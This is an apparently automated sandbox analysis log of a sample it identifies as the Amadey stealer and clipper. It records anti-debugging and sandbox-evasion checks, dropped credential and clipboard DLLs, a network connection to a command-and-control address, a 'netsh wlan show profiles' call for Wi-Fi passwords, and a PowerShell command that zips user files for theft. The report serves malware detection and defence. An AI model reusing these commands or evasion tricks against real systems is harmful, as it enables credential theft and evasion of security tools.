Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7928	Thread sleep count: 1123 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7928	Thread sleep time: -2247123s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7932	Thread sleep count: 1032 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7932	Thread sleep time: -2065032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7892	Thread sleep count: 287 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7892	Thread sleep time: -8610000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 8008	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920	Thread sleep count: 1032 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920	Thread sleep time: -2065032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920	Thread sleep count: 1008 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe TID: 7920	Thread sleep time: -2017008s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2008	Thread sleep count: 9994 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2008	Thread sleep time: -9994000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\wIaKimJFke.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_6E22BA2F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,

10_2_6E22BA2F

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\OneDrive\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Videos\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Music\desktop.ini	Jump to behavior

Source: explorgu.exe, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08E60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp, explorgu.exe, 00000005.00000002.2870677611.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2064247735.0000029F08E72000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.000000000332A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2869541490.0000000003389000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wIaKimJFke.exe, 00000000.00000002.1667967126.00000000006CF000.00000040.00000001.01000000.00000003.sdmp, explorgu.exe, 00000001.00000002.1694186183.000000000048F000.00000040.00000001.01000000.00000007.sdmp, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: rundll32.exe, 00000007.00000002.2064247735.0000029F08DB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: explorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#
Source: netsh.exe, 00000008.00000003.1991253555.0000028334A06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\wIaKimJFke.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_04ED0CC7 Start: 04ED0CDA End: 04ED0CDE

0_2_04ED0CC7

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_04ED0C6D rdtsc

0_2_04ED0C6D

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_6E226871 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

10_2_6E226871

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00515E8B mov eax, dword ptr fs:[00000030h]	0_2_00515E8B
Source: C:\Users\user\Desktop\wIaKimJFke.exe	Code function: 0_2_00519B02 mov eax, dword ptr fs:[00000030h]	0_2_00519B02
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002D5E8B mov eax, dword ptr fs:[00000030h]	5_2_002D5E8B
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Code function: 5_2_002D9B02 mov eax, dword ptr fs:[00000030h]	5_2_002D9B02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E229EDF mov eax, dword ptr fs:[00000030h]	10_2_6E229EDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E22B511 mov eax, dword ptr fs:[00000030h]	10_2_6E22B511

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_6E22CEA4 GetProcessHeap,

10_2_6E22CEA4

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E226871 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_6E226871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E2294D4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_6E2294D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_6E22610D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_6E22610D

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.32 80

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal	Jump to behavior

Source: explorgu.exe, explorgu.exe, 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_004FCD47 cpuid

0_2_004FCD47

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Queries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\NHPKIZUUSG.docx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\wIaKimJFke.exe

Code function: 0_2_004FC54A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_004FC54A

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

Code function: 5_2_002A55B0 LookupAccountNameA,

5_2_002A55B0

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: 10.2.rundll32.exe.6e220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 10.2.rundll32.exe.6e220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIaKimJFke.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.explorgu.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.explorgu.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1627718624.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1694112022.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1653832811.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1944154808.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED

Tries to harvest and steal WLAN passwords

